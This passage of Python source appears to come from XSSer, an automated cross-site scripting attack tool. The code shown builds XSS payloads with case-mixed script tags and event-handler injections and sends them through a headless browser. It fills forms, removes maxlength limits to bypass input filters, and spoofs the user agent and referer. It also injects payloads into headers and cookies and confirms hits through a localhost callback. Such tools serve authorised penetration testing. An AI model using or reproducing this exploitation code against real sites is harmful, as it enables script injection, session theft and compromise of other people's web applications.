 1494. driver = webdriver.Firefox(options=options, firefox_profile=profile, executable_path=current_dir+"/core/driver/geckodriver", log_path=os.devnull) # wrapping!
 1495. except:
 1496. driver = None
 1497. self.token_arrived_flag = False
 1498. if DEBUG == True:
 1499. traceback.print_exc()
 1500. return driver
 1501. def generate_GET_token_payload(self, orig_url, dest_url, query_string, hashing, payload, vector_found):
 1502. if "VECTOR" in orig_url:
 1503. dest_url = orig_url
 1504. else:
 1505. if not dest_url.endswith("/"):
 1506. dest_url = dest_url + "/"
 1507. dest_url = orig_url + query_string
 1508. dest_url = dest_url.split("#")[0]
 1509. p_uri = urlparse(dest_url)
 1510. uri = p_uri.netloc
 1511. path = p_uri.path
 1512. target_params = parse_qs(urlparse(dest_url).query, keep_blank_values=False)
 1513. for key, value in target_params.items():
 1514. if key == vector_found: # only replace parameters with valid hashes
 1515. target_params[key] = payload['payload']
 1516. else:
 1517. target_params[key] = target_params[key][0]
 1518. target_url_params = urllib.parse.urlencode(target_params)
 1519. dest_url = p_uri.scheme + "://" + uri + path + "?" + target_url_params
 1520. dest_url = urllib.parse.unquote(dest_url)
 1521. tok_url = self.generate_token_exploit(hashing, dest_url, payload)
 1522. return tok_url
 1523. def generate_POST_token_payload(self, orig_url, dest_url, query_string, hashing, payload, vector_found):
 1524. if vector_found in dest_url:
 1525. v = dest_url.split(vector_found+"=")[1]
 1526. p = v.split("&")[0]
 1527. dest_url = dest_url.replace(p, payload['payload'])
 1528. dest_url = urllib.parse.unquote(dest_url)
 1529. tok_url = self.generate_token_exploit(hashing, dest_url, payload)
 1530. return tok_url
 1531. def generate_token_exploit(self, hashing, dest_url, payload):
 1532. self_url = "http://localhost:19084/success/" + hashing
 1533. shadow_js_inj = "document.location=document.location.hash.substring(1)"
 1534. shadow_inj = "<SCrIpT>" + shadow_js_inj + "</ScRiPt>"
 1535. _e = self.encoding_permutations
 1536. if self.options.script: # manual injections
 1537. if 'XSS' in dest_url:
 1538. dest_url = dest_url.replace('XSS', hashing)
 1539. elif 'XS1' in dest_url:
 1540. dest_url = dest_url.replace('XS1', hashing)
 1541. if "'>" in dest_url:
 1542. dest_url = dest_url.split("'>")[0]
 1543. tok_url = dest_url + _e("'>" + shadow_inj)
 1544. tok_url += '#' + self_url
 1545. elif '">' in dest_url:
 1546. dest_url = dest_url.split('">')[0]
 1547. tok_url = dest_url + _e('">' + shadow_inj)
 1548. tok_url += '#' + self_url
 1549. elif 'onerror=' in dest_url:
 1550. dest_url = dest_url.split('onerror=')[0]
 1551. tok_url = dest_url + _e('onerror=' + shadow_js_inj + ">")
 1552. tok_url+= '#' + self_url
 1553. elif 'onError=' in dest_url:
 1554. dest_url = dest_url.split('onError=')[0]
 1555. tok_url = dest_url + _e('onError=' + shadow_js_inj + ">")
 1556. tok_url+= '#' + self_url
 1557. elif 'onload=' in dest_url:
 1558. dest_url = dest_url.split('onload=')[0]
 1559. tok_url = dest_url + _e('onload=' + shadow_js_inj + ">")
 1560. tok_url+= '#' + self_url
 1561. elif 'onLoad=' in dest_url:
 1562. dest_url = dest_url.split('onLoad=')[0]
 1563. tok_url = dest_url + _e('onLoad=' + shadow_js_inj + ">")
 1564. tok_url+= '#' + self_url
 1565. else:
 1566. tok_url = dest_url + "#" + self_url
 1567. else: # default + auto injections
 1568. if 'VECTOR' in dest_url:
 1569. dest_url = dest_url.replace('VECTOR', payload['payload'])
 1570. if '">PAYLOAD' in dest_url:
 1571. tok_url = dest_url.replace('">PAYLOAD', _e('">' + shadow_inj))
 1572. tok_url += '#' + self_url
 1573. elif "'>PAYLOAD" in dest_url:
 1574. tok_url = dest_url.replace("'>PAYLOAD", _e("'>" + shadow_inj))
 1575. tok_url += '#' + self_url
 1576. elif "javascript:PAYLOAD" in dest_url:
 1577. tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';"))
 1578. tok_url = dest_url.replace("javascript:PAYLOAD", _e("javascript:" + shadow_js_inj))
 1579. tok_url+= '#' + self_url
 1580. elif '"PAYLOAD"' in dest_url:
 1581. tok_url = dest_url.replace('"PAYLOAD"', '"' + self_url + '"')
 1582. elif "'PAYLOAD'" in dest_url:
 1583. tok_url = dest_url.replace("'PAYLOAD'", "'" + self_url + "'")
 1584. elif 'PAYLOAD' in dest_url and 'SRC' in dest_url:
 1585. tok_url = dest_url.replace('PAYLOAD', self_url)
 1586. elif "SCRIPT" in dest_url:
 1587. tok_url = dest_url.replace('PAYLOAD', shadow_js_inj)
 1588. tok_url += '#' + self_url
 1589. elif 'onerror="PAYLOAD"' in dest_url:
 1590. tok_url = dest_url.replace('onerror="PAYLOAD"', _e('onerror="' + shadow_inj + '"'))
 1591. tok_url+= '#' + self_url
 1592. elif 'onerror="javascript:PAYLOAD"' in dest_url:
 1593. tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';"))
 1594. tok_url = dest_url.replace('onerror="javascript:PAYLOAD"', _e('onerror="javascript:' + shadow_js_inj + '"'))
 1595. tok_url+= '#' + self_url
 1596. elif 'onError="PAYLOAD"' in dest_url:
 1597. tok_url = dest_url.replace('onError="PAYLOAD"', _e('onError="' + shadow_inj + '"'))
 1598. tok_url+= '#' + self_url
 1599. elif 'onError="javascript:PAYLOAD"' in dest_url:
 1600. tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';"))
 1601. tok_url = dest_url.replace('onError="javascript:PAYLOAD"', _e('onError="javascript:' + shadow_js_inj + '"'))
 1602. tok_url+= '#' + self_url
 1603. elif 'onload="PAYLOAD"' in dest_url:
 1604. tok_url = dest_url.replace('onload="PAYLOAD"', _e('onload="' + shadow_inj + '"'))
 1605. tok_url+= '#' + self_url
 1606. elif 'onload="javascript:PAYLOAD"' in dest_url:
 1607. tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';"))
 1608. tok_url = dest_url.replace('onload="javascript:PAYLOAD"', _e('onload="javascript:' + shadow_js_inj + '"'))
 1609. tok_url+= '#' + self_url
 1610. elif 'onLoad="PAYLOAD"' in dest_url:
 1611. tok_url = dest_url.replace('onLoad="PAYLOAD"', _e('onLoad="' + shadow_inj + '"'))
 1612. tok_url+= '#' + self_url
 1613. elif 'onLoad="javascript:PAYLOAD"' in dest_url:
 1614. tok_url = dest_url.replace('javascript:PAYLOAD', self.encoding_permutations("window.location='" + self_url+"';"))
 1615. tok_url = dest_url.replace('onLoad="javascript:PAYLOAD"', _e('onLoad="javascript:' + shadow_js_inj + '"'))
 1616. tok_url+= '#' + self_url
 1617. elif '<PAYLOAD>' in dest_url:
 1618. tok_url = dest_url.replace("<PAYLOAD>", _e(shadow_inj))
 1619. tok_url+= '#' + self_url
 1620. elif 'PAYLOAD' in dest_url:
 1621. tok_url = dest_url.replace("PAYLOAD", _e(shadow_inj))
 1622. tok_url+= '#' + self_url
 1623. elif 'href' in dest_url and 'PAYLOAD' in dest_url:
 1624. tok_url = dest_url.replace('PAYLOAD', self_url)
 1625. elif 'HREF' in dest_url and 'PAYLOAD' in dest_url:
 1626. tok_url = dest_url.replace('PAYLOAD', self_url)
 1627. elif 'url' in dest_url and 'PAYLOAD' in dest_url:
 1628. tok_url = dest_url.replace('PAYLOAD', self_url)
 1629. else:
 1630. tok_url = dest_url + "#" + self_url
 1631. return tok_url
 1632. def do_token_check(self, orig_url, hashing, payload, query_string, dest_url): # searching for a [100% VULNERABLE] XSS exploit!
 1633. tok_url = None
 1634. tok_total = []
 1635. if self.hash_found:
 1636. for l in self.hash_found:
 1637. vector_found = l[2]
 1638. hash_found = l[3]
 1639. if hashing in hash_found:
 1640. if not self.options.postdata: # GET
 1641. tok_url = self.generate_GET_token_payload(orig_url, dest_url, query_string, hashing, payload, vector_found)
 1642. else: # POST
 1643. tok_url = self.generate_POST_token_payload(orig_url, dest_url, query_string, hashing, payload, vector_found)
 1644. if tok_url:
 1645. self.send_token_exploit(orig_url, tok_url, hashing, vector_found)
 1646. def generate_headless_cookies(self, orig_url): # generate cookies for internal headless browser engine
 1647. self.driver.get(orig_url)
 1648. r_cookies = self.driver.get_cookies() # get cookies
 1649. if self.options.cookie:
 1650. cookie = SimpleCookie()
 1651. cookie.load(self.options.cookie)
 1652. for key, morsel in cookie.items():
 1653. for c in r_cookies:
 1654. if key == c["name"]:
 1655. c["value"] = str(morsel.value)
 1656. for c in r_cookies:
 1657. self.driver.add_cookie(c) # add cookies to driver
 1658. def send_token_exploit(self, orig_url, tok_url, hashing, vector_found):
 1659. try:
 1660. if self.cookie_set_flag == False:
 1661. if not self.options.postdata: # GET
 1662. self.generate_headless_cookies(tok_url) # send 'tok_url'
 1663. else: # POST
 1664. self.generate_headless_cookies(orig_url) # send 'orig_url'
 1665. self.cookie_set_flag = True # cookie has been set!
 1666. if self.options.postdata: # GET + web forms scrapping + POST
 1667. self.driver.get(orig_url) # GET request to store forms
 1668. tok_parsed = parse_qs(tok_url)
 1669. param_found = []
 1670. for param_parsed in tok_parsed: # find params
 1671. param = self.driver.find_element_by_name(param_parsed) # by name
 1672. if not param:
 1673. param = self.driver.find_element_by_id(param_parsed) # by id
 1674. if param:
 1675. value = str(tok_parsed[param_parsed])
 1676. if "#http://localhost:19084/success/"+str(hashing) in value: # re-parsing injected params for POST
 1677. value = value.replace("#http://localhost:19084/success/"+str(hashing), "")
 1678. if "<SCrIpT>document.location=document.location.hash.substring(1)</ScRiPt>" in value:
 1679. value = value.replace("<SCrIpT>document.location=document.location.hash.substring(1)", "<SCrIpT src='http://localhost:19084/success/"+str(hashing)+"'>")
 1680. if "['" in value:
 1681. value = value.replace("['", "")
 1682. if "']" in value:
 1683. value = value.replace("']", "")
 1684. param.send_keys(str(value))
 1685. param_found.append(param)
 1686. max_length = param.get_attribute("maxlength")
 1687. if max_length: # bypass max length filters by changing DOM | black magic!
 1688. self.driver.execute_script("arguments[0].setAttribute('maxlength', arguments[1])", param, '9999999')
 1689. if len(param_found) == len(tok_parsed): # form fully filled!
 1690. login = self.driver.find_element_by_xpath("//*[@type='submit']") # find submit by type
 1691. login.click() # click it!
 1692. else: # GET
 1693. self.driver.get(tok_url)
 1694. if tok_url not in self.final_attacks:
 1695. self.final_attacks[hashing] = {'url': tok_url}
 1696. self.token_arrived_flag = True
 1697. else:
 1698. self.token_arrived_flag = False
 1699. except:
 1700. self.token_arrived_flag = False
 1701. if DEBUG == True:
 1702. traceback.print_exc()
 1703. def _report_attack_failure(self, curl_handle, dest_url, payload,\
 1704. query_string, orig_url):
 1705. """
 1706. report connection failure of an attack
 1707. """
 1708. options = self.options
 1709. current_hashes = [] # to check for ongoing hashes
 1710. if payload['browser'] == "[Heuristic test]":
 1711. for key, value in self.hashed_injections.items():
 1712. if str(key) in dest_url:
 1713. if key not in current_hashes:
 1714. self.final_hashes[key] = value
 1715. current_hashes.append(key)
 1716. elif self.options.hash:
 1717. for key, value in self.hashed_injections.items():
 1718. self.final_hashes[key] = value
 1719. current_hashes.append(key)
 1720. else:
 1721. self.report("-"*45)
 1722. self.report("\n[!] Hashing: \n")
 1723. for key, value in self.hashed_injections.items():
 1724. if str(key) in str(dest_url):
 1725. if key not in current_hashes:
 1726. self.report(" [ " +key+" ] : [" , value + " ]")
 1727. self.final_hashes[key] = value
 1728. current_hashes.append(key)
 1729. else:
 1730. if payload["browser"] == "[Data Control Protocol Injection]": # [DCP Injection]
 1731. b64_string = payload["payload"].split("[B64]")
 1732. b64_string = b64_string[1]
 1733. b64_string = b64_string.replace('PAYLOAD', key)
 1734. b64_string = b64encode(b64_string)
 1735. b64_string = urllib.parse.urlencode({'':b64_string})
 1736. if b64_string.startswith("="):
 1737. b64_string = b64_string.replace("=", "")
 1738. if str(b64_string) in str(dest_url):
 1739. if key not in current_hashes:
 1740. self.report(" [ " +key+" ] : [" , value + " ]")
 1741. self.final_hashes[key] = value
 1742. current_hashes.append(key)
 1743. else: # when using encoders (Str, Hex, Dec...)
 1744. if self.options.Str or self.options.Une or self.options.Mix or self.options.Dec or self.options.Hex or self.options.Hes or self.options.Cem:
 1745. if "PAYLOAD" in payload["payload"]:
 1746. payload_string = payload["payload"].replace("PAYLOAD", key)
 1747. elif "VECTOR" in payload["payload"]:
 1748. payload_string = payload["payload"].replace("VECTOR", key)
 1749. elif "XSS" in payload["payload"]:
 1750. payload_string = payload["payload"].replace("XSS", key)
 1751. elif "X1S" in payload["payload"]:
 1752. payload_string = payload["payload"].replace("X1S", key)
 1753. if self.options.Cem:
 1754. enc_perm = options.Cem.split(",")
 1755. for e in enc_perm:
 1756. hashed_payload = self.encoding_permutations(payload_string)
 1757. if e == "Str":
 1758. hashed_payload = hashed_payload.replace(",", "%2C")
 1759. dest_url = dest_url.replace(",", "%2C")
 1760. if e == "Mix":
 1761. hashed_payload=urllib.parse.quote(hashed_payload)
 1762. dest_url = urllib.parse.quote(dest_url)
 1763. if e == "Dec":
 1764. hashed_payload = hashed_payload.replace("&#", "%26%23")
 1765. dest_url = dest_url.replace("&#", "%26%23")
 1766. if e == "Hex":
 1767. hashed_payload = hashed_payload.replace("%", "%25")
 1768. dest_url = dest_url.replace("%", "%25")
 1769. if e == "Hes":
 1770. hashed_payload = hashed_payload.replace("&#", "%26%23")
 1771. hashed_payload = hashed_payload.replace(";", "%3B")
 1772. dest_url = dest_url.replace("&#", "%26%23")
 1773. dest_url = dest_url.replace(";", "%3B")
 1774. else:
 1775. hashed_payload = self.encoding_permutations(payload_string)
 1776. if self.options.Str:
 1777. hashed_payload = hashed_payload.replace(",", "%2C")
 1778. dest_url = dest_url.replace(",", "%2C")
 1779. if self.options.Mix:
 1780. hashed_payload=urllib.parse.quote(hashed_payload)
 1781. dest_url = urllib.parse.quote(dest_url)
 1782. if self.options.Dec:
 1783. hashed_payload = hashed_payload.replace("&#", "%26%23")
 1784. dest_url = dest_url.replace("&#", "%26%23")
 1785. if self.options.Hex:
 1786. hashed_payload = hashed_payload.replace("%", "%25")
 1787. dest_url = dest_url.replace("%", "%25")
 1788. if self.options.Hes:
 1789. hashed_payload = hashed_payload.replace("&#", "%26%23")
 1790. hashed_payload = hashed_payload.replace(";", "%3B")
 1791. dest_url = dest_url.replace("&#", "%26%23")
 1792. dest_url = dest_url.replace(";", "%3B")
 1793. if str(hashed_payload) in str(dest_url):
 1794. if key not in current_hashes:
 1795. self.report(" [ " +key+" ] : [" , value + " ]")
 1796. self.final_hashes[key] = value
 1797. current_hashes.append(key)
 1798. if self.extra_hashed_injections:
 1799. for k, v in self.extra_hashed_injections.items():
 1800. payload_url = str(v[1])
 1801. if payload_url == payload["payload"]:
 1802. if k not in current_hashes:
 1803. self.report(" [ " +k+" ] : [" , v[0] + " ]")
 1804. self.final_hashes[k] = v[0]
 1805. current_hashes.append(k)
 1806. self.report("\n"+"-"*45+"\n")
 1807. if payload['browser'] == "[Heuristic test]":
 1808. self.report("[+] Checking: " + str(payload['payload']).strip('XSS'), "\n")
 1809. else:
 1810. if self.extra_hashed_injections:
 1811. extra_attacks=[]
 1812. if options.xsa:
 1813. extra_attacks.append("XSA")
 1814. if options.xsr:
 1815. extra_attacks.append("XSR")
 1816. if options.coo:
 1817. extra_attacks.append("COO")
 1818. if extra_attacks:
 1819. extra_attacks = "+ "+ str(extra_attacks)
 1820. if options.postdata:
 1821. self.report("[*] Trying: " + extra_attacks + "\n\n" + orig_url.strip(), "(POST:", query_string + ") \n")
 1822. else:
 1823. self.report("[*] Trying: " + extra_attacks + "\n\n" + dest_url.strip()+"\n")
 1824. else:
 1825. if options.postdata:
 1826. self.report("[*] Trying: \n\n" + orig_url.strip(), "(POST:", query_string + ")\n")
 1827. else:
 1828. self.report("[*] Trying: \n\n" + dest_url.strip()+"\n")
 1829. if not self.options.hash and not self.options.script:
 1830. if not "XSS" in dest_url or not "X1S" in dest_url and self.options.xsa or self.options.xsr or self.options.coo:
 1831. pass
 1832. if payload['browser'] == "[Heuristic test]" or payload['browser'] == "[hashed_precheck_system]" or payload['browser'] == "[manual_injection]":
 1833. pass
 1834. else:
 1835. if not "XSS" in dest_url or not "X1S" in dest_url:
 1836. if self.options.xsa or self.options.xsr or self.options.coo:
 1837. pass
 1838. else:
 1839. self.report("-"*45)
 1840. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
 1841. if not self.options.verbose:
 1842. self.report("-"*45 + "\n")
 1843. else:
 1844. self.report("-"*45)
 1845. self.report("\n[+] Vulnerable(s): \n\n " + payload['browser'] + "\n")
 1846. if not self.options.verbose:
 1847. self.report("-"*45 + "\n")
 1848. # statistics injections counters
 1849. if payload['browser']=="[hashed_precheck_system]" or payload['browser']=="[Heuristic test]":
 1850. self.check_positives = self.check_positives + 1
 1851. elif payload['browser']=="[Data Control Protocol Injection]":
 1852. self.dcp_injection = self.dcp_injection + 1
 1853. elif payload['browser']=="[Document Object Model Injection]":
 1854. self.dom_injection = self.dom_injection + 1
 1855. elif payload['browser']=="[Induced Injection]":
 1856. self.httpsr_injection = self.httpsr_injection + 1
 1857. elif payload['browser']=="[manual_injection]":
 1858. self.manual_injection = self.manual_injection + 1
 1859. else:
 1860. self.auto_injection = self.auto_injection +1
 1861. if not self.hashed_injections:
 1862. for k, v in self.extra_hashed_injections.items():
 1863. if k in current_hashes:
 1864. if v[0] == "XSA":
 1865. agent = v[1]
 1866. agent = agent.replace("PAYLOAD", k)
 1867. Curl.agent = agent
 1868. if v[0] == "XSR":
 1869. referer = v[1]
 1870. referer = referer.replace("PAYLOAD", k)
 1871. Curl.referer = referer
 1872. if v[0] == "COO":
 1873. cookie = v[1]
 1874. cookie = cookie.replace("PAYLOAD", k)
 1875. Curl.cookie = cookie
 1876. else:
 1877. for key, value in self.hashed_injections.items():
 1878. for k, v in self.extra_hashed_injections.items():
 1879. payload_url = v[1]
 1880. payload_url = payload_url.replace("PAYLOAD",key)
 1881. payload_url = payload_url.replace(" ", "+") # black magic!
 1882. final_dest_url = str(urllib.parse.unquote(dest_url.strip()))
 1883. if payload_url in final_dest_url:
 1884. if v[0] == "XSA":
 1885. agent = v[1]
 1886. agent = agent.replace("PAYLOAD", k)
 1887. Curl.agent = agent
 1888. if v[0] == "XSR":
 1889. referer = v[1]
 1890. referer = referer.replace("PAYLOAD", k)
 1891. Curl.referer = referer
 1892. if v[0] == "COO":
 1893. cookie = v[1]
 1894. cookie = cookie.replace("PAYLOAD", k)
 1895. Curl.cookie = cookie
 1896. else:
 1897. if k in current_hashes:
 1898. if v[0] == "XSA":
 1899. agent = v[1]
 1900. agent = agent.replace("PAYLOAD", k)
 1901. Curl.agent = agent
 1902. if v[0] == "XSR":
 1903. referer = v[1]
 1904. referer = referer.replace("PAYLOAD", k)
 1905. Curl.referer = referer
 1906. if v[0] == "COO":
 1907. cookie = v[1]
 1908. cookie = cookie.replace("PAYLOAD", k)
 1909. Curl.cookie = cookie
 1910. if options.verbose:
 1911. self.report("-"*45)
 1912. self.report("\n[+] HTTP Headers Verbose:\n")
 1913. self.report(" [Client Request]")
 1914. Curl.print_options()
 1915. self.report(" [Server Reply]\n")
 1916. self.report(curl_handle.info())
 1917. self.report("="*45)
 1918. self.report("[*] Injection(s) Results:")
 1919. self.report("="*45 + "\n")
 1920. if payload['browser']=="[Heuristic test]":
 1921. for key, value in self.final_hashes.items():
 1922. if str(key) in dest_url:
 1923. heuristic_string = key
 1924. heuristic_param = str(payload['payload']).strip('XSS')
 1925. if heuristic_param == "\\":
 1926. self.heuris_backslash_notfound = self.heuris_backslash_notfound + 1
 1927. elif heuristic_param == "/":
 1928. self.heuris_slash_notfound = self.heuris_slash_notfound + 1
 1929. elif heuristic_param == ">":
 1930. self.heuris_mayor_notfound = self.heuris_mayor_notfound + 1
 1931. elif heuristic_param == "<":
 1932. self.heuris_minor_notfound = self.heuris_minor_notfound + 1
 1933. elif heuristic_param == ";":
 1934. self.heuris_semicolon_notfound = self.heuris_semicolon_notfound + 1
 1935. elif heuristic_param == "'":
 1936. self.heuris_colon_notfound = self.heuris_colon_notfound + 1
 1937. elif heuristic_param == '"':
 1938. self.heuris_doublecolon_notfound = self.heuris_doublecolon_notfound + 1
 1939. elif heuristic_param == "=":
 1940. self.heuris_equal_notfound = self.heuris_equal_notfound + 1
 1941. self.add_failure(dest_url, heuristic_param, value, query_string, orig_url, 'heuristic') # heuristic fail
 1942. elif self.options.hash:
 1943. for key, value in self.final_hashes.items():
 1944. self.add_failure(dest_url, key, value, query_string, orig_url, 'hashing check') # hashing_check fail
 1945. self.report("\n" +"="*45)
 1946. else:
 1947. for key, value in self.final_hashes.items():
 1948. if "XSA" in value:
 1949. method = "xsa"
 1950. hashing = key
 1951. elif "XSR" in value:
 1952. method = "xsr"
 1953. hashing = key
 1954. elif "COO" in value:
 1955. method = "coo"
 1956. hashing = key
 1957. else:
 1958. method = "url"
 1959. hashing = key
 1960. if self.options.Str:
 1961. payload_string = payload["payload"].replace("PAYLOAD", key)
 1962. hashed_payload = self.encoding_permutations(payload_string)
 1963. hashed_payload = hashed_payload.replace(",", "%2C")
 1964. if str(hashed_payload) in str(dest_url):
 1965. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
 1966. elif self.options.Mix:
 1967. payload_string = payload["payload"].replace("PAYLOAD", key)
 1968. hashed_payload = self.encoding_permutations(payload_string)
 1969. hashed_payload=urllib.parse.quote(hashed_payload)
 1970. if str(hashed_payload) in str(dest_url):
 1971. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
 1972. elif self.options.Dec:
 1973. payload_string = payload["payload"].replace("PAYLOAD", key)
 1974. hashed_payload = self.encoding_permutations(payload_string)
 1975. hashed_payload = hashed_payload.replace("&#", "%26%23")
 1976. if str(hashed_payload) in str(dest_url):
 1977. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
 1978. elif self.options.Hex:
 1979. payload_string = payload["payload"].replace("PAYLOAD", key)
 1980. hashed_payload = self.encoding_permutations(payload_string)
 1981. hashed_payload = hashed_payload.replace("%", "%25")
 1982. if str(hashed_payload) in str(dest_url):
 1983. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
 1984. elif self.options.Hes:
 1985. payload_string = payload["payload"].replace("PAYLOAD", key)
 1986. hashed_payload = self.encoding_permutations(payload_string)
 1987. hashed_payload = hashed_payload.replace("&#", "%26%23")
 1988. hashed_payload = hashed_payload.replace(";", "%3B")
 1989. if str(hashed_payload) in str(dest_url):
 1990. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
 1991. else:
 1992. if self.options.Cem:
 1993. enc_perm = options.Cem.split(",")
 1994. payload_string = payload["payload"].replace("PAYLOAD", key)
 1995. for e in enc_perm:
 1996. hashed_payload = self.encoding_permutations(payload_string)
 1997. if str(e) == "Str":
 1998. hashed_payload = hashed_payload.replace(",", "%2C")
 1999. if e == "Mix":
 2000. hashed_payload=urllib.parse.quote(hashed_payload)
 2001. if e == "Dec":
 2002. hashed_payload = hashed_payload.replace("&#", "%26%23")
 2003. if e == "Hex":
 2004. hashed_payload = hashed_payload.replace("%", "%25")
 2005. if e == "Hes":
 2006. hashed_payload = hashed_payload.replace("&#", "%26%23")
 2007. hashed_payload = hashed_payload.replace(";", "%3B")
 2008. if str(hashed_payload) in str(dest_url):
 2009. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
 2010. else:
 2011. if str(key) in str(dest_url):
 2012. self.add_failure(dest_url, payload, key, query_string, orig_url, value) # failed!
 2013. else:
 2014. if key in current_hashes:
 2015. if method == "xsa":
 2016. self.add_failure(dest_url, payload, key, query_string, orig_url, "XSA") # failed!
 2017. elif method == "xsr":
 2018. self.add_failure(dest_url, payload, key, query_string, orig_url, "XSR") # failed!
 2019. elif method == "coo":
 2020. self.add_failure(dest_url, payload, key, query_string, orig_url, "COO") # failed!
 2021. self.report("\n" +"="*45)
 2022. if str(curl_handle.info()["http-code"]) == "404":
 2023. self.report("\n[Error] 404 Not Found: The server has not found anything matching the Request-URI\n")
 2024. elif str(curl_handle.info()["http-code"]) == "403":
 2025. self.report("\n[Error] 403 Forbidden: The server understood the request, but is refusing to fulfill it\n")
 2026. elif str(curl_handle.info()["http-code"]) == "400":
 2027. self.report("\n[Error] 400 Bad Request: The request could not be understood by the server due to malformed syntax\n")
 2028. elif str(curl_handle.info()["http-code"]) == "401":
 2029. self.report("\n[Error] 401 Unauthorized: The request requires user authentication\n\nIf you are trying to authenticate: Login is failing!\n\ncheck:\n- authentication type is correct for the type of realm (basic, digest, gss, ntlm...)\n- credentials 'user:password' are typed correctly\n")
 2030. elif str(curl_handle.info()["http-code"]) == "407":
 2031. self.report("\n[Error] 407 Proxy Authentication Required: XSSer must first authenticate itself with the proxy\n")
 2032. elif str(curl_handle.info()["http-code"]) == "408":
 2033. self.report("\n[Error] 408 Request Timeout: XSSer did not produce a request within the time that the server was prepared to wait\n")
 2034. elif str(curl_handle.info()["http-code"]) == "500":
 2035. self.report("\n[Error] 500 Internal Server Error: The server encountered an unexpected condition which prevented it from fulfilling the request\n")
 2036. elif str(curl_handle.info()["http-code"]) == "501":
 2037. self.report("\n[Error] 501 Not Implemented: The server does not support the functionality required to fulfill the request\n")
 2038. elif str(curl_handle.info()["http-code"]) == "502":
 2039. self.report("\n[Error] 502 Bad Gateway: The server received an invalid response from the upstream server\n")
 2040. elif str(curl_handle.info()["http-code"]) == "503":
 2041. self.report("\n[Error] 503 Service Unavailable: The server is currently unable to handle the request [OFFLINE!]\n")
 2042. elif str(curl_handle.info()["http-code"]) == "504":
 2043. self.report("\n[Error] 504 Gateway Timeout: The server did not receive a timely response specified by the URI (try: --ignore-proxy)\n")
 2044. elif str(curl_handle.info()["http-code"]) == "0":
 2045. self.report("\n[Error] XSSer (or your TARGET) is not working properly...\n\n - Wrong URL\n - Firewall\n - Proxy\n - Target offline\n - [?] ...\n")
 2046. else:
 2047. self.report("\n[Error] Not injected!. Server responses with http-code different to: 200 OK (" + str(curl_handle.info()["http-code"]) + ")\n")
 2048. if str(curl_handle.info()["http-code"]) == "404":
 2049. self.not_connection = self.not_connection + 1
 2050. elif str(curl_handle.info()["http-code"]) == "503":
 2051. self.forwarded_connection = self.forwarded_connection + 1
 2052. else:
 2053. self.other_connection = self.other_connection + 1
 2054. def check_positive(self, curl_handle, dest_url, payload, query_string):
 2055. """
 2056. Perform extra check for positives
 2057. """
 2058. body = curl_handle.body()
 2059. pass
 2060. def create_options(self, args=None):
 2061. """
 2062. Create options for OptionParser.
 2063. """
 2064. self.optionParser = XSSerOptions()
 2065. self.options = self.optionParser.get_options(args)
 2066. if not self.options:
 2067. return False
 2068. return self.options
 2069. def _get_attack_urls(self):
 2070. """
 2071. Process payload options and make up the payload list for the attack.
 2072. """
 2073. urls = []
 2074. options = self.options
 2075. p = self.optionParser
 2076. if options.imx:
 2077. self.create_fake_image(options.imx, options.script)
 2078. return []
 2079. if options.flash:
 2080. self.create_fake_flash(options.flash, options.script)
 2081. return []
 2082. if options.update:
 2083. self.report('='*75)
 2084. self.report(str(p.version))
 2085. self.report('='*75)
 2086. try:
 2087. print("\nTrying to update to the latest stable version...\n")
 2088. Updater()
 2089. except:
 2090. print("Not any .git repository found!\n")
 2091. print("="*30)
 2092. print("\nTo have working this feature, you should clone XSSer with:\n")
 2093. print("$ git clone https://code.03c8.net/epsylon/xsser\n")
 2094. print("\nAlso you can try this other mirror:\n")
 2095. print("$ git clone https://github.com/epsylon/xsser\n")
 2096. return []
 2097. if options.wizard: # processing wizard template
 2098. if self.user_template is not None:
 2099. self.options.statistics = True # detailed output
 2100. if self.user_template[0] == "DORKING": # mass-dorking
 2101. self.options.dork_file = True
 2102. self.options.dork_mass = True
 2103. elif "http" in self.user_template[0]: # from target url
 2104. self.options.url = self.user_template[0]
 2105. else: # from file
 2106. self.options.readfile = self.user_template[0]
 2107. if self.user_template[1] == "CRAWLER": # crawlering target
 2108. self.options.crawling = "10"
 2109. else: # manual payload (GET or POST)
 2110. if self.user_template_conntype == "GET":
 2111. self.options.getdata = self.user_template[1]
 2112. else:
 2113. self.options.postdata = self.user_template[1]
 2114. if self.user_template[2] == "Proxy: No - Spoofing: Yes":
 2115. self.options.ignoreproxy = True
 2116. self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
 2117. self.options.referer = "127.0.0.1" # spoof referer
 2118. elif self.user_template[2] == "Proxy: No - Spoofing: No":
 2119. self.options.ignoreproxy = True
 2120. else: # using proxy + spoofing
 2121. self.options.agent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search" # spoof agent
 2122. self.options.referer = "127.0.0.1" # spoof referer
 2123. if self.user_template[2] is not None:
 2124. self.options.proxy = self.user_template[2]
 2125. else:
 2126. self.options.ignoreproxy = True
 2127. if self.user_template[3] == "Not using encoders":
 2128. pass
 2129. elif self.user_template[3] == "Hex": # Hexadecimal
 2130. self.options.Hex = True
 2131. elif self.user_template[3] == "Str+Une": # StringFromCharCode()+Unescape()
 2132. self.options.Str = True
 2133. self.options.Une = True
 2134. else: # Character encoding mutations
 2135. self.options.Cem = self.user_template[3]
 2136. if self.user_template[4] == "Alertbox": # Classic AlertBox injection
 2137. self.options.finalpayload = "<script>alert('XSS');</script>"
 2138. else:
 2139. if self.user_template[4] is not None: # Inject user script
 2140. self.options.finalpayload = self.user_template[4]
 2141. else: # not final injection
 2142. pass
 2143. else: # exit
 2144. return
 2145. if options.target: # miau!
 2146. self.report('='*75)
 2147. self.report(str(p.version))
 2148. self.report('='*75)
 2149. self.report("Testing [Full XSS audit]... ;-)")
 2150. self.report('='*75)
 2151. self.report("\n[Info] The following actions will be performed at the end:\n")
 2152. self.report(" 1- Output with detailed statistics\n")
